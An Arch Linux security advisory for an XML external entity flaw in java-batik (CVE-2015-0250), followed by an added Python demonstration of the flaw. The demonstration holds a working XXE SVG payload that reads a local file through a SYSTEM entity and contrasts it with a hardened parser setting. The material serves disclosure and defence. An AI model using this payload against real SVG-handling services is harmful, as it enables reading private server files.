[arch-security] [ASA-201504-5] java-batik: xml external entity injection
Arch Linux Security Advisory ASA-201504-5
=========================================

Severity: Medium
Date    : 2015-04-04
CVE-ID  : CVE-2015-0250
Package : java-batik
Type    : xml external entity injection
Remote  : Yes
Link    : https://wiki.archlinux.org/index.php/CVE

Summary
=======

The package java-batik before version 1.8-1 is vulnerable to xml external
entity injection.

Resolution
==========

Upgrade to 1.8-1.

# pacman -Syu "java-batik>=1.8-1"

The problem has been fixed upstream in version 1.8.

Workaround
==========

None.

Description
===========

Batik offers several classes for SVG to PNG/JPG conversion which suffer from an
XML External Entity Injection due to the evaluation of external entities within
the given SVG file. If an application lets users upload SVG files, an attacker
can submit a maliciously formed file and retrieve sensitive information such as
the contents of files on the server. Which files can be read depends on the user
context in which the application is running.

Impact
======

A remote attacker is able to use a specially crafted SVG file to read arbitrary
files or cause a denial of service.

References
==========

http://seclists.org/fulldisclosure/2015/Mar/142
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0250
https://bugs.archlinux.org/task/44410
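The "evaluation of external entities within the given SVG file" that the Description refers to, shown as an added example that is not part of the advisory and not Batik's code: a constructed SVG whose DOCTYPE declares a SYSTEM entity backed by a local file is parsed twice with Python's standard xml.sax parser, once with external general entities enabled (the behaviour of an unpatched parser) and once with them disabled. The secret file, the <text> collector and the demo() helper are assumptions made for the demonstration; Batik itself is Java and this does not use its API, but the parser setting it toggles is the same class of control (refuse to fetch external entities, or refuse DOCTYPE declarations altogether) that a hardened SVG pipeline needs.

```python
"""XXE through an SVG DOCTYPE: external-entity evaluation on versus off.

Constructed demonstration for this advisory; it uses Python's standard
xml.sax parser, not Batik, to show why evaluating external entities in an
uploaded SVG lets the file's author read local files on the server.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed malicious SVG. The internal DTD subset declares an external
# general entity backed by a local file; the <text> element references it so
# the file's contents end up in the rendered document.
SVG_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file://{path}">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="50">
  <text x="0" y="20">&xxe;</text>
</svg>
"""


class TextCollector(ContentHandler):
    """Gathers the character data inside <text> elements (stand-in for a renderer)."""

    def __init__(self):
        super().__init__()
        self.in_text = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "text":
            self.in_text = True

    def endElement(self, name):
        if name == "text":
            self.in_text = False

    def characters(self, content):
        if self.in_text:
            self.chunks.append(content)


def render_text(svg_bytes, resolve_external_entities):
    """Parse an SVG and return the text a renderer would draw.

    resolve_external_entities=True makes the parser fetch SYSTEM entities, the
    behaviour the advisory describes for Batik before 1.8; False is the
    hardened configuration, where the entity reference expands to nothing.
    The feature is set explicitly so the result does not depend on the
    Python version's default.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(svg_bytes))
    return "".join(handler.chunks).strip()


def demo():
    """Write a constructed 'secret' file, then parse the SVG both ways.

    Returns (text seen with entity resolution on, text seen with it off, secret).
    """
    secret = "root:x:0:0:root:/root:/bin/bash"  # constructed stand-in for /etc/passwd
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "secret.txt")
        with open(path, "w", encoding="ascii") as fh:
            fh.write(secret)
        svg = SVG_TEMPLATE.format(path=path).encode("ascii")
        leaked = render_text(svg, resolve_external_entities=True)
        blocked = render_text(svg, resolve_external_entities=False)
    return leaked, blocked, secret


if __name__ == "__main__":
    leaked, blocked, secret = demo()
    print("entities evaluated:", repr(leaked))   # file contents leak into the image text
    print("entities disabled: ", repr(blocked))  # empty string
```

The leaked text is exactly what an attacker would see in the PNG/JPG produced from the uploaded SVG, which is why the advisory's Impact is file disclosure under the privileges of the converting process; the same entity mechanism pointed at a slow or unbounded resource gives the denial of service it also mentions.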
participants (1)
-
Levente Polyak